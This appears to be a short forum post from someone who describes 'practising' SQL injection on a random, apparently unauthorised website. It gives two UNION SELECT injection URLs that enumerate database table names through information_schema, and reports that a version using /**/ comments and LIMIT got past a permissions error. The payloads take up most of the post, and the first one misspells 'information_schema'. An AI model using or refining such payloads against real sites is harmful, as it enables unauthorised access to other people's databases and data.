Hello
I was practising my sqli on some random website. So everything was going fine up until checking the table names. So I tried
page.php?ID=0x2d7+union+all+select+1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+infromation_schema.tables
It gave the error:
SELECT command denied to user 'usrmcv'@'127.0.0.1' for table 'tables'
So then I tried
/page.php?ID=0x2d7/**/union/**/all/**/select/**/1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+FROM+information_schema.tables+LIMIT+1,1
Like this I could browse through the tables and I was wondering why that is???